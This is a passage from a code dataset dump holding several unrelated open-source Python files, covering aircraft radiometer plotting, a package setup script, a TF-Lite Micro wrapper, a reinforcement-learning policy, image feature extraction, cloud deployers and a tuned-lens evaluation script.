'clearsky_irradiance_ghi' in data.keys():\n plot_clearsky_irradiance(fig.get_axes()[0], data)\n plot_sun_position(fig.get_axes()[1], data)\n plot_altitude(fig.get_axes()[2], data)\n\n # adjust ylim for GIN_ALT figure\n fig.get_axes()[-1].callbacks.connect('xlim_changed', adjust_ylim)\n\n set_suptitle(fig, ds, 'QA-Broadband Radiometers')\n\n ax = fig.get_axes()[0]\n zoom_to_flight_duration(ax, data)\n add_time_buffer(ax)\n\n # adds grey bar showing takeoff/landing and only plots the flight\n for ax in fig.get_axes():\n add_takeoff(ax, data)\n add_landing(ax, data)\n fig.canvas.draw()\n return fig\n","repo_name":"ncasuk/faampy","sub_path":"faampy/qa_plotting/bbr.py","file_name":"bbr.py","file_ext":"py","file_size_in_byte":10258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"740696367","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"dbhelpy\",\n version=\"0.6.0\",\n author=\"Angel Davila\",\n author_email=\"adavila0703@gmail.com\",\n description=\"dbhelpy is an easy to use Python library that allows you to interact with your sqlite database using \"\n \"dbhelpy methods\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/adavila0703/dbhelpy\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.8',\n)","repo_name":"adavila0703/dbhelpy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6596670441","text":"\nimport os\nimport sysconfig\nimport logging\nimport importlib\nimport copy\nimport threading\nimport inspect\nfrom typing import Union, List, Dict, Tuple\nimport numpy as np\n\nfrom mltk.core.tflite_model import TfliteModel, TfliteLayer\nfrom mltk.core.utils import get_mltk_logger\nfrom mltk.utils.python import (as_list, get_case_insensitive, import_module_at_path, append_exception_msg)\nfrom mltk.utils.path import (fullpath, get_user_setting)\nfrom ..profiling_results import 
ProfilingModelResults, ProfilingLayerResult\nfrom .tflite_micro_accelerator import (TfliteMicroAccelerator, PlaceholderTfliteMicroAccelerator)\nfrom .tflite_micro_model import TfliteMicroModel, TfliteMicroModelDetails\n\n\n\nclass TfliteMicro:\n \"\"\"This class wraps the TF-Lite Micro C++ library\n\n This class allows for loading a .tflite model file\n into the TF-Lite Micro (TFLM) C++ library and running inference\n using either the TFLM reference kernels or hardware accelerated kernels.\n \"\"\"\n _model_lock = threading.Lock()\n _wrapper = None\n _logger:logging.Logger = None\n _logged_errors:List[str] = []\n _accelerators:Dict[str,TfliteMicroAccelerator] = {}\n _accelerator_paths:List[str] = []\n\n @staticmethod\n def git_hash() -> str:\n \"\"\"Return the GIT hash of the MLTK repo used to compile the wrapper library\"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.git_hash()\n\n @staticmethod\n def api_version() -> int:\n \"\"\"Return the TFLM API version number.\n This is used to ensure accelerator wrappers are compatible with\n this TFLM wrapper\"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.api_version()\n\n @staticmethod\n def set_log_level(level: str) -> str:\n \"\"\"Set the C++ wrapper logging level\n\n NOTE: This sets the level in the C++ wrapper, NOT the Python logger.\n Increasing the logging level can help with throughput as each\n log generated by the wrapper needs to be forwarded to the Python logger.\n\n Returns:\n The previous log level\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n prev_level = wrapper.get_log_level()\n if not wrapper.set_log_level(level):\n raise RuntimeError(f'Failed to set MLTK log level to {level}')\n return prev_level\n\n @staticmethod\n def get_log_level() -> str:\n \"\"\"Return the C++ wrapper's logging level\n\n NOTE: This returns the C++ wrapper's logging level, NOT the Python logger.\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.get_log_level()\n\n @staticmethod\n def set_logger(logger: logging.Logger):\n \"\"\"Set the wrapper's Python logger\n\n This logger will be invoked by the C++ wrapper's logging callback.\n \"\"\"\n TfliteMicro._logger = logger\n\n @staticmethod\n def get_logger() -> logging.Logger:\n \"\"\"Return the wrapper's Python logger\"\"\"\n # Just use the MLTK logger if no logger has been specified\n if TfliteMicro._logger is None:\n logger = get_mltk_logger()\n TfliteMicro._logger = logger\n\n return TfliteMicro._logger\n\n @staticmethod\n def normalize_accelerator_name(accelerator:str) -> str:\n \"\"\"Given a case-insensitive accelerator name, normalize\n the name to the format used by the C++ library\n\n Returns:\n Normalized name of accelerator or None if accelerator\n is unknown\n \"\"\"\n TfliteMicro._load_wrapper()\n if accelerator is None:\n return None\n\n return get_case_insensitive(accelerator, TfliteMicro._accelerators)\n\n @staticmethod\n def get_supported_accelerators() -> List[str]:\n \"\"\"Return a list of supported accelerators by name\"\"\"\n TfliteMicro._load_wrapper()\n return [x for x in TfliteMicro._accelerators]\n\n @staticmethod\n def accelerator_is_supported(accelerator:str) -> bool:\n \"\"\"Return if the given accelerator is supported\"\"\"\n TfliteMicro._load_wrapper()\n return get_case_insensitive(accelerator, TfliteMicro._accelerators) is not None\n\n\n @staticmethod\n def load_tflite_model(\n model: Union[str, TfliteModel],\n accelerator:str=None,\n enable_profiler=False,\n enable_tensor_recorder=False,\n force_buffer_overlap=False,\n 
runtime_buffer_size=0,\n **kwargs\n ) -> TfliteMicroModel:\n \"\"\"Load the TF-Lite Micro interpreter with the given .tflite model\n\n NOTE:\n - Only 1 model may be loaded at a time\n - You must call unload_model() when the model is no longer needed\n\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n\n if accelerator is not None:\n tflm_accelerator = TfliteMicro.get_accelerator(accelerator)\n if hasattr(tflm_accelerator, 'init_variant'):\n tflm_accelerator.init_variant()\n else:\n tflm_accelerator = None\n\n TfliteMicro._model_lock.acquire()\n try:\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicroModel(\n tflm_wrapper=wrapper,\n tflm_accelerator=tflm_accelerator,\n flatbuffer_data=tflite_model.flatbuffer_data,\n enable_profiler=enable_profiler,\n enable_tensor_recorder=enable_tensor_recorder,\n force_buffer_overlap=force_buffer_overlap,\n runtime_buffer_size=runtime_buffer_size,\n )\n except:\n # Release the model lock if an exception occurred while loading it\n TfliteMicro._model_lock.release()\n raise\n\n return tflm_model\n\n @staticmethod\n def unload_model(model: TfliteMicroModel):\n \"\"\"Unload a previously loaded model\"\"\"\n accelerator = model.accelerator\n if accelerator is not None:\n if hasattr(accelerator, 'deinit_variant'):\n accelerator.deinit_variant()\n\n del model\n TfliteMicro._model_lock.release()\n\n\n\n @staticmethod\n def profile_model(\n model: Union[str, TfliteModel],\n accelerator:str=None,\n return_estimates=False,\n disable_simulator_backend=False,\n runtime_buffer_size=-1, # If runtime_buffer_size not given, determine the optimal memory size\n input_data: Union[np.ndarray,List[np.ndarray]]=None,\n **kwargs\n ) -> ProfilingModelResults:\n \"\"\"Profile the given model in the simulator and optionally determine metric estimates\n\n \"\"\"\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicro.load_tflite_model(\n model=tflite_model,\n accelerator=accelerator,\n enable_profiler=True,\n runtime_buffer_size=runtime_buffer_size\n )\n try:\n renable_simulator_backend = False\n disable_calculate_accelerator_cycles_only = False\n tflm_accelerator = tflm_model.accelerator\n\n if disable_simulator_backend and \\\n tflm_accelerator is not None and \\\n hasattr(tflm_accelerator, 'set_simulator_backend_enabled'):\n renable_simulator_backend = True\n tflm_accelerator.set_simulator_backend_enabled(False)\n\n if hasattr(tflm_accelerator, 'set_calculate_accelerator_cycles_only_enabled'):\n # For profiling, we only need the accelerator cycles\n # The simulator does not need to actually calculate valid output data\n # This greatly improves simulation latency\n disable_calculate_accelerator_cycles_only = True\n tflm_accelerator.set_calculate_accelerator_cycles_only_enabled(True)\n\n tflm_model_details = tflm_model.details\n\n if input_data is not None:\n if isinstance(input_data, list):\n for i, v in enumerate(input_data):\n tflm_model.input(index=i, value=v)\n else:\n tflm_model.input(value=input_data)\n else:\n for i in range(tflm_model.input_size):\n input_tensor = tflm_model.input(i)\n empty_tensor = np.zeros_like(input_tensor)\n tflm_model.input(i, value=empty_tensor)\n\n tflm_model.invoke()\n tflm_results = tflm_model.get_profiling_results()\n recorded_data = tflm_model.get_recorded_data()\n\n if renable_simulator_backend:\n tflm_accelerator.set_simulator_backend_enabled(True)\n if disable_calculate_accelerator_cycles_only:\n tflm_accelerator.set_calculate_accelerator_cycles_only_enabled(False)\n\n layer_results = []\n for layer_index, 
(tflm_layer_result, recorded_layer_data) in enumerate(zip(tflm_results, recorded_data)):\n layer_err = tflm_model.get_layer_error(layer_index)\n layer_err_msg = None if layer_err is None else layer_err.msg\n del tflm_layer_result['name']\n layer_result = ProfilingLayerResult(\n tflite_layer=tflite_model.layers[layer_index],\n error_msg=layer_err_msg,\n **tflm_layer_result\n )\n layer_result.update(recorded_layer_data)\n layer_results.append(layer_result)\n\n finally:\n TfliteMicro.unload_model(tflm_model)\n\n results = ProfilingModelResults(\n model=tflite_model,\n accelerator=accelerator,\n runtime_memory_bytes=tflm_model_details.runtime_memory_size,\n layers=layer_results\n )\n\n\n # If we want to return estimates for metrics like:\n # CPU cycles and energy\n if return_estimates:\n # If accelerator=none\n # then just use the MVP accelerator's 'none' (i.e. CMSIS-only) estimators\n if tflm_accelerator is None and 'MVP' in TfliteMicro._accelerators:\n tflm_accelerator = TfliteMicro._accelerators['MVP']\n\n if tflm_accelerator is not None:\n tflm_accelerator.estimate_profiling_results(\n results=results,\n **kwargs\n )\n\n return results\n\n\n @staticmethod\n def record_model(\n model: Union[str, TfliteModel],\n input_data: Union[np.ndarray,List[np.ndarray]]=None,\n accelerator:str=None,\n enable_accelerator_recorder = False,\n disable_simulator_backend=False,\n return_model_details=False\n ) -> Union[List[TfliteLayer], Tuple[List[TfliteLayer],TfliteMicroModelDetails]]:\n \"\"\"Run one inference and record each model layer's input/output tensors\n\n Args:\n model: path to .tflite model file or TfliteModel instance\n input_data: Model input0 data as numpy array or list of numpy arrays for each model input\n accelerator: Optional accelerator to use for inference\n enable_accelerator_recorder: If enabled, record the data/instructions generated by the hardware accelerator\n The recorded data with be stored in each layers' metadata property, .e.g.: ``layer.metadata['accelerator_data']``.\n Each layers' recorded data is a dictionary with the entries specific to the hardware accelerator.\n disable_simulator_backend: Disable the simulator backend while running the accelerator recorder.\n This can greatly improve execution time, however, the generated data output (i.e. 
output tensors) is invalid\n return_model_details: Also return the recorded model's TfliteMicroModelDetails\n Return:\n Return a list of TfliteLayers with the tensor data\n updated with the recorded values from the previous inference\n \"\"\"\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicro.load_tflite_model(\n model=tflite_model,\n accelerator=accelerator,\n enable_tensor_recorder=True,\n enable_profiler=False,\n runtime_buffer_size=16*1024*1024 # 16MB\n )\n\n reenable_simulator_backend = False\n if enable_accelerator_recorder:\n if tflm_model.accelerator is None:\n raise ValueError('Must provide accelerator when using enable_accelerator_recorder')\n if disable_simulator_backend and hasattr(tflm_model.accelerator, 'set_simulator_backend_enabled'):\n reenable_simulator_backend = True\n tflm_model.accelerator.set_simulator_backend_enabled(False)\n\n tflm_model.accelerator.enable_program_recorder()\n\n\n try:\n if input_data is not None:\n if isinstance(input_data, list):\n for i, v in enumerate(input_data):\n tflm_model.input(index=i, value=v)\n else:\n tflm_model.input(value=input_data)\n\n tflm_model.invoke()\n recorded_data = tflm_model.get_recorded_data()\n\n if reenable_simulator_backend:\n tflm_model.accelerator.set_simulator_backend_enabled(True)\n\n retval = []\n\n for layer_index, recorded_layer_data in enumerate(recorded_data):\n # pylint: disable=protected-access\n tf_layer = copy.deepcopy(tflite_model.layers[layer_index])\n retval.append(tf_layer)\n\n layer_err = tflm_model.get_layer_error(layer_index)\n tf_layer.metadata['error_msg'] = None if layer_err is None else layer_err.msg\n\n for input_index, input_bytes in enumerate(recorded_layer_data['inputs']):\n if input_index >= tf_layer.n_inputs:\n break\n input_tensor = tf_layer.inputs[input_index]\n if input_tensor is None:\n continue\n input_buf = np.frombuffer(input_bytes, dtype=input_tensor.dtype)\n if input_tensor.shape.flat_size > 0:\n tf_layer.inputs[input_index]._data = np.reshape(input_buf, newshape=input_tensor.shape)\n else:\n tf_layer.inputs[input_index]._data = input_buf\n\n for output_index, output_bytes in enumerate(recorded_layer_data['outputs']):\n output_tensor = tf_layer.outputs[output_index]\n output_buf = np.frombuffer(output_bytes, dtype=output_tensor.dtype)\n if output_tensor.shape.flat_size > 0:\n tf_layer.outputs[output_index]._data = np.reshape(output_buf, newshape=output_tensor.shape)\n else:\n tf_layer.outputs[output_index]._data = output_buf\n\n for key, value in recorded_layer_data.items():\n if key not in ('inputs', 'outputs'):\n tf_layer.metadata[key] = value\n\n if return_model_details:\n model_details = tflm_model.details\n finally:\n TfliteMicro.unload_model(tflm_model)\n\n if return_model_details:\n return retval, model_details\n\n return retval\n\n\n @staticmethod\n def add_accelerator_path(path:str):\n \"\"\"Add an accelerator search path\"\"\"\n TfliteMicro._accelerator_paths.append(path)\n\n\n @staticmethod\n def register_accelerator(accelerator:TfliteMicroAccelerator):\n \"\"\"Register a TFLM accelerator instance\"\"\"\n try:\n acc_api_version = accelerator.api_version\n except Exception as e:\n # pylint:disable=raise-missing-from\n raise RuntimeError(\n f'Failed to load accelerator: {accelerator.name}, ' + \\\n f'failed to retrieve api version from wrapper, err: {e}')\n\n tflm_api_version = TfliteMicro.api_version()\n if tflm_api_version != acc_api_version:\n raise RuntimeError(\n f'Accelerator: {accelerator.name} not compatible, ' + \\\n f'accelerator API version 
({acc_api_version}) != TFLM wrapper version ({tflm_api_version})'\n )\n\n for variant in accelerator.variants:\n if TfliteMicro.accelerator_is_supported(variant):\n raise RuntimeError(f'Accelerator \"{variant}\" has already been registered')\n\n acc = copy.deepcopy(accelerator)\n acc.active_variant = variant\n TfliteMicro._accelerators[variant] = acc\n\n\n @staticmethod\n def get_accelerator(name:str) -> TfliteMicroAccelerator:\n \"\"\"Return an instance to the specified accelerator wrapper\"\"\"\n\n TfliteMicro._load_wrapper()\n\n\n norm_accelerator = TfliteMicro.normalize_accelerator_name(name)\n if norm_accelerator is None:\n raise ValueError(f'Unknown accelerator: {name}. Known accelerators are: {\", \".join(TfliteMicro.get_supported_accelerators())}')\n\n return TfliteMicro._accelerators[norm_accelerator]\n\n\n @staticmethod\n def _load_wrapper():\n \"\"\"Load the TFLM C++ wrapper and return a refernce to the loaded module\"\"\"\n if TfliteMicro._wrapper is not None:\n return TfliteMicro._wrapper\n\n # Add this wrapper directory to the env PATH\n # This way, the wrapper DLL can find additional DLLs as necessary\n wrapper_dir = os.path.dirname(os.path.abspath(__file__))\n os.environ['PATH'] = wrapper_dir + os.pathsep + os.environ['PATH']\n if hasattr(os, 'add_dll_directory'):\n os.add_dll_directory(wrapper_dir)\n\n # Import the TFLM C++ python wrapper\n # For more details, see:\n # <mltk root>/cpp/tflite_micro_wrapper\n try:\n TfliteMicro._wrapper = importlib.import_module('mltk.core.tflite_micro._tflite_micro_wrapper')\n except (ImportError, ModuleNotFoundError) as e:\n append_exception_msg(e,\n f'Failed to import the tflite_micro_wrapper C++ shared library.\\n' \\\n 'If you built the MLTK from source then this could mean you need to re-build the mltk package (e.g. \"pip install -e .\").\\n' \\\n 'If you\\'re running from a pre-built MLTK package (e.g. 
\"pip install silabs-mltk\"),\\n' \\\n f'ensure that the _tflite_micro_wrapper file exists at {wrapper_dir}.\\n' \\\n 'If the file does not exist, try installing, e.g.: pip install silabs-mltk --force-reinstall\\n\\n'\n )\n raise\n\n # Initialize the wrapper\n TfliteMicro._wrapper.init()\n\n # Set the callback that will be invoked by the C++ library\n # log messages\n TfliteMicro._wrapper.set_logger_callback(TfliteMicro._wrapper_logger_callback)\n\n TfliteMicro._load_accelerators()\n\n return TfliteMicro._wrapper\n\n\n @staticmethod\n def _load_accelerators():\n \"\"\"Load all the TFLM accelerators found in the search paths\"\"\"\n curdir = os.path.dirname(os.path.abspath(__file__))\n search_paths = []\n search_paths.extend(TfliteMicro._accelerator_paths)\n search_paths.extend(as_list(get_user_setting('accelerator_paths')))\n search_paths.append(f'{curdir}/accelerators/mvp')\n\n # Check if any \"<accelerator name>_mltk_accelerator.pth\" files are found in the Python Libs directory\n python_libs_dir = sysconfig.get_path('purelib')\n if os.path.exists(python_libs_dir):\n for fn in os.listdir(python_libs_dir):\n if not fn.endswith('_mltk_accelerator.pth'):\n continue\n pth_path = f'{python_libs_dir}/{fn}'\n with open(pth_path, 'r') as f:\n accelerator_package_base_dir = f.readline().strip()\n accelerator_name = fn[:-len('_mltk_accelerator.pth')]\n accelerator_dir = f'{accelerator_package_base_dir}/{accelerator_name}'\n\n # If the file does exist,\n # then add its path to the accelerator search path\n if os.path.exists(accelerator_dir):\n search_paths.append(accelerator_dir)\n elif os.path.exists(f'{accelerator_dir}_wrapper'):\n search_paths.append(f'{accelerator_dir}_wrapper')\n\n for search_path in search_paths:\n search_path = fullpath(search_path)\n init_py_path = f'{search_path}/__init__.py'\n if not os.path.exists(init_py_path):\n continue\n TfliteMicro._load_accelerator(search_path)\n\n TfliteMicro.register_accelerator(PlaceholderTfliteMicroAccelerator('cmsis'))\n\n\n\n @staticmethod\n def _load_accelerator(accelerator_dir:str) -> bool:\n \"\"\"Attempt to load an accelerator Python module in the given directory\"\"\"\n logger = TfliteMicro.get_logger()\n try:\n accelerator_module = import_module_at_path(accelerator_dir)\n except Exception as e:\n logger.debug(f'Failed to import {accelerator_dir}, err: {e}', exc_info=e)\n return False\n\n tflm_accelerator = None\n for key in dir(accelerator_module):\n value = getattr(accelerator_module, key)\n if inspect.isclass(value) and issubclass(value, TfliteMicroAccelerator):\n # Create an accelerator instance\n tflm_accelerator = value()\n break\n\n if tflm_accelerator is None:\n logger.debug(f'Accelerator module: {accelerator_dir} does not contain a TfliteMicroAccelerator class definition')\n return False\n\n try:\n TfliteMicro.register_accelerator(tflm_accelerator)\n except Exception as e:\n logger.warning(f'Failed to register accelerator: {accelerator_dir}, err: {e}')\n return False\n\n return True\n\n\n @staticmethod\n def _clear_logged_errors():\n \"\"\"Clear errors generated by C++ wrapper. This is used internally by the wrapper\"\"\"\n TfliteMicro._load_wrapper()\n TfliteMicro._logged_errors.clear()\n\n\n @staticmethod\n def _get_logged_errors() -> List[str]:\n \"\"\"Return errors generated by C++ wrapper as a list. 
This is used internally by the wrapper\"\"\"\n TfliteMicro._load_wrapper()\n return TfliteMicro._logged_errors\n\n\n @staticmethod\n def _get_logged_errors_str() -> str:\n \"\"\"Return errors generated by C++ wrapper as a string. This is used internally by the wrapper\"\"\"\n return \"\\n\".join(TfliteMicro._get_logged_errors())\n\n\n @staticmethod\n def _wrapper_logger_callback(msg: str):\n \"\"\" This callback will be invoked by the TFLM C++ wrapper\n when it internally issues a log msg\"\"\"\n l = TfliteMicro.get_logger()\n if l is None:\n return\n\n errs = TfliteMicro._logged_errors\n\n level = msg[:2].strip()\n msg = msg[2:].strip()\n\n if level == 'D':\n l.debug(msg)\n elif level == 'I':\n l.info(msg)\n elif level == 'W':\n l.warning(msg)\n errs.append(msg)\n elif level == 'E':\n l.error(msg)\n errs.append(msg)\n\n\ndef _load_tflite_model(model:Union[str,TfliteModel]) -> TfliteModel:\n if isinstance(model, TfliteModel):\n return model\n\n elif isinstance(model, str):\n if not model.endswith('.tflite') or not os.path.exists(model):\n raise ValueError('Provided model must be a path to an existing .tflite file')\n return TfliteModel.load_flatbuffer_file(model)\n else:\n raise RuntimeError('Must provide TfliteModel or path to .tflite file')\n","repo_name":"SiliconLabs/mltk","sub_path":"mltk/core/tflite_micro/tflite_micro.py","file_name":"tflite_micro.py","file_ext":"py","file_size_in_byte":23647,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"81"} +{"seq_id":"74593534985","text":"from contextlib import nullcontext\nfrom typing import Dict\n\nimport numpy as np\nfrom tianshou import policy\nfrom tianshou.data import Batch, to_torch_as\nimport torch\nfrom torch.cuda import amp\nfrom torch.optim import Optimizer\n\n\nclass DummyScaler(amp.GradScaler):\n def __init__(self): # pylint: disable=super-init-not-called\n pass\n\n def scale(self, outputs: torch.Tensor) -> torch.Tensor:\n return outputs\n\n def step(self, optimizer: Optimizer, *args, **kwargs):\n return optimizer.step()\n\n def update(self, new_scale=None):\n del new_scale\n\n\nclass DQNPolicy(policy.DQNPolicy):\n def __init__(self, *args, autocast: bool = False, **kwargs):\n super().__init__(*args, **kwargs)\n self.autocast = autocast\n if autocast:\n self.scaler = amp.GradScaler()\n else:\n self.scaler = DummyScaler()\n\n def learn(self, batch: Batch, **kwargs) -> Dict[str, float]:\n if self._target and self._iter % self._freq == 0:\n self.sync_weight()\n self.optim.zero_grad()\n weight = batch.pop(\"weight\", 1.0)\n autocast = amp.autocast() if self.autocast else nullcontext()\n with autocast:\n q = self(batch).logits\n q = q[np.arange(len(q)), batch.act]\n r = to_torch_as(batch.returns.flatten(), q)\n td = r - q\n loss = (td.pow(2) * weight).mean()\n batch.weight = td # prio-buffer\n self.scaler.scale(loss).backward()\n self.scaler.step(self.optim)\n self.scaler.update()\n self._iter += 1\n return {\"loss\": loss.item()}\n","repo_name":"bitsandscraps/QMIX","sub_path":"qmix/utils/autocast.py","file_name":"autocast.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"2361682384","text":"from utils import *\n\n\nwith timer('image'):\n train_image_files = sorted(glob.glob('../../input/petfinder-adoption-prediction/train_images/*.jpg'))\n test_image_files = sorted(glob.glob('../../input/petfinder-adoption-prediction/test_images/*.jpg'))\n image_files = train_image_files + 
test_image_files\n train_images = pd.DataFrame(image_files, columns=['image_filename'])\n train_images['PetID'] = train_images['image_filename'].apply(lambda x: x.split('/')[-1].split('-')[0])\n\nwith timer('densenet'):\n batch_size = 16\n pet_ids = train_images['PetID'].values\n img_pathes = train_images['image_filename'].values\n n_batches = len(pet_ids) // batch_size + 1\n\n inp = Input((256, 256, 3))\n backbone = DenseNet169(input_tensor=inp,\n weights='../../input/densenet-keras/DenseNet-BC-169-32-no-top.h5',\n include_top=False)\n x = backbone.output\n x = GlobalAveragePooling2D()(x)\n x = Lambda(lambda x: K.expand_dims(x, axis=-1))(x)\n x = AveragePooling1D(4)(x)\n out = Lambda(lambda x: x[:, :, 0])(x)\n m = Model(inp, out)\n\n features = []\n for b in range(n_batches):\n start = b * batch_size\n end = (b + 1) * batch_size\n batch_pets = pet_ids[start: end]\n batch_path = img_pathes[start: end]\n batch_images = np.zeros((len(batch_pets), img_size, img_size, 3))\n for i,(pet_id, path) in enumerate(zip(batch_pets, batch_path)):\n try:\n batch_images[i] = load_image(path)\n except:\n try:\n batch_images[i] = load_image(path)\n except:\n pass\n batch_preds = m.predict(batch_images)\n for i, pet_id in enumerate(batch_pets):\n features.append([pet_id] + list(batch_preds[i]))\n X = pd.DataFrame(features, columns=[\"PetID\"]+[\"dense169_{}\".format(i) for i in range(batch_preds.shape[1])])\n gp = X.groupby(\"PetID\").mean().reset_index()\n #train = pd.merge(train, gp, how=\"left\", on=\"PetID\")\n del m; gc.collect()\n pd.merge(train[[\"PetID\"]], gp, how=\"left\", on=\"PetID\").drop(\"PetID\", axis=1).to_feather(\"../feature/dense169.feather\")","repo_name":"okotaku/pet_finder","sub_path":"code/fe/26dense169.py","file_name":"26dense169.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"30748646966","text":"from . import cloud, default\nfrom .. import attributes as A\nfrom ..util import log\n\n\ndef get_stage_deployers(keys, stack):\n \"\"\"\n Returns a list of deployer objects that *create* cloud resources. Each\n member of the list is responsible for provisioning a single stack resource\n (e.g. 
a virtual server, a security group, a bucket, etc...).\n\n :param keys: A list of top-level configuration keys for which to create\n deployers.\n :type keys: :class:`~collections.Iterable`\n\n :param config: A stack object.\n :type config: :class:`~bang.stack.Stack`\n\n :rtype: :class:`list` of :class:`~bang.deployers.deployer.Deployer`\n\n \"\"\"\n config = stack.config\n creds = config[A.DEPLOYER_CREDS]\n deployers = []\n for res_type in keys:\n res_configs = config.get(res_type)\n if not res_configs:\n continue\n log.debug(\"Found config for resource type, %s\" % res_type)\n for res_config in res_configs:\n if A.PROVIDER in res_config:\n ds = cloud.get_deployers(res_config, res_type, stack, creds)\n else:\n ds = [default.ServerDeployer(stack, res_config)]\n if ds:\n deployers.extend(ds)\n return deployers\n","repo_name":"fr33jc/bang","sub_path":"bang/deployers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"40067786207","text":"\"\"\"Evaluation loop for the tuned lens model.\"\"\"\nimport json\nimport logging\nfrom collections import defaultdict\nfrom dataclasses import dataclass\nfrom itertools import islice\nfrom pathlib import Path\nfrom typing import Literal, Optional\n\nimport torch as th\nfrom simple_parsing import field\nfrom tqdm.auto import tqdm\nfrom transformers import PreTrainedModel\n\nfrom tuned_lens.nn.lenses import Lens, LogitLens, TunedLens\nfrom tuned_lens.scripts.ingredients import (\n Data,\n Distributed,\n Model,\n)\nfrom tuned_lens.stats import LogitStats\nfrom tuned_lens.utils import (\n maybe_all_reduce,\n pytree_map,\n pytree_stack,\n shift_labels,\n shift_preds,\n)\n\nLensType = Literal[\"logit\", \"tuned\"]\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _nested_dict():\n return defaultdict(_nested_dict)\n\n\n@dataclass\nclass Eval:\n \"\"\"Type hinting for CLI args.\"\"\"\n\n data: Data\n\n model: Model\n\n dist: Distributed\n\n output: Path = field(alias=[\"-o\"])\n \"\"\"Folder to save the eval results to.\"\"\"\n\n lens_name: Optional[str] = field(alias=[\"-l\"], default=None)\n \"\"\"Path to the tuned lens model to evaluate. Defaults to None.\"\"\"\n\n logit: bool = True\n \"\"\"Whether to evaluate the logit lens\"\"\"\n\n seed: int = 42\n \"\"\"Random seed used for data shuffling.\"\"\"\n\n tokens: Optional[int] = None\n \"\"\"Number of tokens to evaluate on. 
If None, will use the entire dataset.\"\"\"\n\n token_shift: int = field(default=1)\n \"\"\"How to shift the labels wrt the input tokens (1 = next token, 0 = current token,\n -1 = previous token, etc.)\"\"\"\n\n per_gpu_batch_size: int = 1\n \"\"\"Number of samples to try to fit on a GPU at once.\"\"\"\n\n layer_transfer: bool = field(action=\"store_true\")\n \"\"\"Evaluate the transfer of the lens to different layers of the transformer.\"\"\"\n\n record_logit_stats: bool = field(action=\"store_true\")\n \"\"\"Record the statistics of the marginal token distribution at each layer.\"\"\"\n\n def load_lens(self, model: PreTrainedModel) -> dict[str, Lens]:\n \"\"\"Load the tuned lens model.\"\"\"\n lenses = {}\n if self.logit:\n lenses[\"logit\"] = LogitLens.from_model(model)\n if self.lens_name is not None:\n lenses[\"tuned\"] = TunedLens.from_model_and_pretrained(model, self.lens_name)\n return lenses\n\n def calculate_batch_limit(self, tokens_per_sample: int):\n \"\"\"Calculate the total number of batches to evaluate on.\"\"\"\n assert self.tokens is not None\n global_batch_size = self.dist.world_size * self.per_gpu_batch_size\n tokens_per_batch = global_batch_size * tokens_per_sample\n return self.tokens // tokens_per_batch\n\n def _initialize_logit_stats_recorders(\n self, lenses: dict[str, Lens], total_layers: int\n ):\n if self.record_logit_stats:\n self.logit_stats_recorders = {\n lens_type: {f\"layer_{i}\": LogitStats() for i in range(total_layers)}\n for lens_type in lenses.keys()\n }\n self.logit_stats_recorder_final = LogitStats()\n else:\n self.logit_stats_recorders = None\n self.logit_stats_recorder_final = None\n\n def _record_logit_stats(self, logp: th.Tensor, layer: int, lens_type: str):\n if self.logit_stats_recorders is not None:\n self.logit_stats_recorders[lens_type][f\"layer_{layer}\"].update(\n logp, assume_normalized=True\n )\n\n def _record_logit_stats_final(self, logp: th.Tensor):\n if self.logit_stats_recorder_final is not None:\n self.logit_stats_recorder_final.update(logp, assume_normalized=True)\n\n def _save_logit_stats(self) -> defaultdict:\n logit_stats = _nested_dict()\n if self.logit_stats_recorders is not None:\n for lens_type, recorders in self.logit_stats_recorders.items():\n for layer, recorder in recorders.items():\n recorder.all_reduce_()\n logit_stats[lens_type][\"logit_stats\"][layer] = (\n recorder.marginal_probs.cpu().numpy().tolist()\n )\n\n if self.logit_stats_recorder_final is not None:\n self.logit_stats_recorder_final.all_reduce_()\n logit_stats[\"baseline\"][\"logit_stats\"][\"final\"] = (\n self.logit_stats_recorder_final.marginal_probs.cpu().numpy().tolist()\n )\n\n return logit_stats\n\n def _evaluate_lenses_on_hidden(\n self,\n lenses: dict[str, Lens],\n hidden: th.Tensor,\n layer: int,\n final_probs: th.Tensor,\n final_lps: th.Tensor,\n labels: th.Tensor,\n batch_output: defaultdict,\n total_layers: int,\n ):\n \"\"\"Evaluate a lens at a given layer. 
